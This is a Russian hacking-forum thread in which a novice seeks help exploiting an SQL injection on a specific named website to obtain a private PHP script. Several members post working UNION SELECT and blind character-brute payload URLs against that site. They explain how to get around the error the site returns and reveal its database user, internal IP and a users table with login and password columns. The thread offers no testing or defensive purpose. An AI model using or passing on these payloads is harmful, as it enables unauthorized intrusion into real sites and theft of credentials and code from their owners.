Требуется помощь по SQL-Inj |
17.03.2007, 17:54
|
|
Новичок
Регистрация: 30.01.2007
Сообщений: 17
С нами:
10146554
Репутация:
2
|
|
Требуется помощь по SQL-Inj
Есть один сайт, на котором один очень нужный мне в личных целях пхп-скрипт. В паблике его нет и таких скриптов в интернете можно пересчитать по пальцам одной руки. В общем, нужная штука. На одном из сайтов, где такой скрипт имеется, я набрёл на SQL-инъекцию. Мой опыт в таких делах примерно соизмерим с уровнем обычного лесного дерева, но я взялся за дело.
В общем, при неверной обработке запроса в одном из скриптов сайт начал меня материть SQL-ошибками. Я почитал здесь на форуме несколько статей и сотворил примерно следущее:
Код:
http://smurf1.free.fr/go.php?lien=-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null--
Но во всех статьях сказано, что при правильном подборе количества столбцов должна открыться обычная страница, у которой все поля будут пустыми. Тут я и тормознул. Количество столбцов правильное, а вот страница не открывается. Просто другая SQL-ошибка. Про это ничего в статьях не написано.
Протолкните меня кто-нибудь дальше по "процессу", а? Буду премного благодарен. |
|
|
17.03.2007, 18:15
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Там такая хрень там 2 запроса идут подряд, первый запрос идёт с SELECT , а второй идёт с UPDATE . Т.к. UNION можно юзать тока с SELECT, а с UPDATE нельзя, поэтому он на UPDATE выплёвывает ошибку запроса. Тебе поможет посимвольный брут)
http://injection.rulezz.ru/mysql_char_brute.html
user()
smurf1@172.20.244.229
http://smurf1.free.fr/go.php?lien=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/*
две таблицы users (колонки login и pass) и user
__________________
Последний раз редактировалось +toxa+; 17.03.2007 в 18:24..
|
|
|
|
17.03.2007, 18:35
|
|
Новичок
Регистрация: 30.01.2007
Сообщений: 17
С нами:
10146554
Репутация:
2
|
|
Ай андестуд насынг, как говорила моя первая учительница английского языка.
Объясни пожалуйста, откуда ты взял smurf1@172.20.244.229 и почему по ссылке http://smurf1.free.fr/go.php?lien=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/* у меня открывается ни много, ни мало та же самая страница, что и час назад?
|
|
|
|
17.03.2007, 18:38
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Изучай http://injection.rulezz.ru/
в smurf1@172.20.244.229 это когда я попробовал вытащить чё-нить из mysql.users он мне показал что у меня прав нет
upd
http://smurf1.free.fr/go.php?lien=1+and+ascii(substring(0x73656c65637420 6c6f67696e2066726f6d207573657273,1,1))=115/* и далее...
__________________
Последний раз редактировалось +toxa+; 17.03.2007 в 18:52..
|
|
|
|
18.03.2007, 19:50
|
|
Новичок
Регистрация: 30.01.2007
Сообщений: 17
С нами:
10146554
Репутация:
2
|
|
0x73656c65637420 6c6f67696e2066726f6d207573657273
Совсем не понимаю, что это такое? Понимаю, что что-то закодировано в ascii, но что? И, главное, зачем? (это я так пытаюсь походу осилить посимвольный брут)
|
|
|
|
18.03.2007, 20:08
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
73 65 6c 65 63 74 20 6c 6f 67 69 6e 20 66 72 6f 6d 20 75 73 65 72 73
hex
|
|
|
|
18.03.2007, 20:10
|
|
Новичок
Регистрация: 30.01.2007
Сообщений: 17
С нами:
10146554
Репутация:
2
|
|
Час от часу не легче...
Последний раз редактировалось Navern; 23.03.2007 в 03:03..
|
|
|
|
18.03.2007, 20:53
|
|
Познающий
Регистрация: 27.02.2007
Сообщений: 89
С нами:
10106115
Репутация:
195
|
|
73 65 6c 65 63 74 20 6c 6f 67 69 6e 20 66 72 6f 6d 20 75 73 65 72 73
я дурак? или действительно из HEX будет верно "select login from users"  чё к чему? не пойму...
сорри...тремя топиками выше не прочитал...извинтиляюсь...
Последний раз редактировалось ssk.ex0.uf0; 18.03.2007 в 21:04..
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
